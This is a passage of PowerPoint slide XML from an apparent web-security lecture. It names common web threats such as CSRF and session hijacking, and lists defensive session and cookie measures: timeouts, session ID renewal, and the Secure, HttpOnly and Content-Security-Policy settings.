          <a:p>
            <a:pPr marL="280094" indent="-269144"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Cross-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Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="28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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="28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Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="28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(CSRF)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599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Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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3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hijacking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604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Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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32" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Authentication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604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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="13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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Escalation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599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Sensitive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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Leakage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604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617" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…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many</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="10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more!</a:t>
            </a:r>
            <a:endParaRPr sz="1951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4" y="576303"/>
            <a:ext cx="3861227" cy="4610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8047" y="553250"/>
            <a:ext cx="3838175" cy="3803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77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3222" spc="68" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="50" dirty="0"/>
              <a:t>Management:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="191" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution?!</a:t>
            </a:r>
            <a:endParaRPr sz="3222"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338359" y="1228839"/>
            <a:ext cx="7948364" cy="5101233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82415">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
            </a:pP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Therefore,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="200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identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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must</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="200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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="204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important</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="200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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>asset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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="154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spc="617" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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some</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="154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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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protection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>plans</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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spc="68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>below</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="154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spc="91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="159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spc="32" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="408" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="682675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682675"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>threats: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2033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Implementing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Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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Timeouts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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(Idle,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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Absolute,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Renewal).</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="404581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Session-ID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must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renewed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when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an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authentication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state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passed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(i.e.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on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logging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951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logging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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out).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599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Forcing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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Session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Logout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when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client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>window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1951" spc="1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closed.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604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95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Disallowing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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cross-tab</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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sessions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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(i.e.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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one</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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per</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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tab!).</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="289316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Ensuring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session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23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IDs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cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="20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be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easily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guessed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(use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large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space</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and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generate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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ids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with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a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9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>good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45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>random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number</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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generator).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599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95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use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framework's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session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="21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generator.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604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73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Always</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="1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77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>check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for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session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185" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ID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reuse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(different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user-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agent,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64" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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address,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="17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etc.)</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" indent="-269144">
              <a:spcBef>
                <a:spcPts val="604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951" spc="109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Check</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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for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authentication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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="19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54" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="19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51" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>operations.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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0034" y="576303"/>
            <a:ext cx="3861227" cy="4610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8047" y="553250"/>
            <a:ext cx="3838175" cy="3803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77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3222" spc="68" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="50" dirty="0"/>
              <a:t>Management:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="191" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="195" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3222" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A5322E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution?!</a:t>
            </a:r>
            <a:endParaRPr sz="3222"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338359" y="1319607"/>
            <a:ext cx="7907447" cy="3446869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158490">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1634" b="1" spc="45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Proper</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" b="1" spc="1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b="1" u="sng" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="363929"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" b="1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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Management:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" b="1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Session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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123" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634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browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="17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-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="77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1634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64" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="1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Therefore,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>managed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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properly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="1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-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ensure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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="2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634" spc="2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86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sessions…</a:t>
            </a:r>
            <a:endParaRPr sz="1634" dirty="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1815" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="258194" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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634" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="7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45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"Domain"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="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59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="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-36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"Path"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="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attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="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634" spc="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restrict</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="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634" spc="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54" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scope</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="8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1634" spc="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68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="8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-23" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to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narrow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="3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45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>subdomains.</a:t>
            </a:r>
            <a:endParaRPr sz="1634" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" indent="-269144">
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef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634" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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"Secure"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634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force</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634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send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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68" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="145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over</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="1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123" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTPS.</a:t>
            </a:r>
            <a:endParaRPr sz="1634" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="126215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634" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="1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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"HttpOnly"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634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prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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64" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>accessing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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1634" spc="136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59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cookies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(limited</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="40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-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>security).</a:t>
            </a:r>
            <a:endParaRPr sz="1634" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="365967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634" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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"X-XSS-Protection"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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header</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634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82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634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634" spc="227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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="23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-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="118" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="1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-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="1634" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="4611" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1634" spc="95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="254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"Content-Security-Policy"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="2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headers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="2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634" spc="2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instruct</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="2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browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="2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1634" spc="268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82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="26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50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>load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resources</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="3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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="313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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whitelisted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1634" spc="3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634" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>locations.</a:t>
            </a:r>
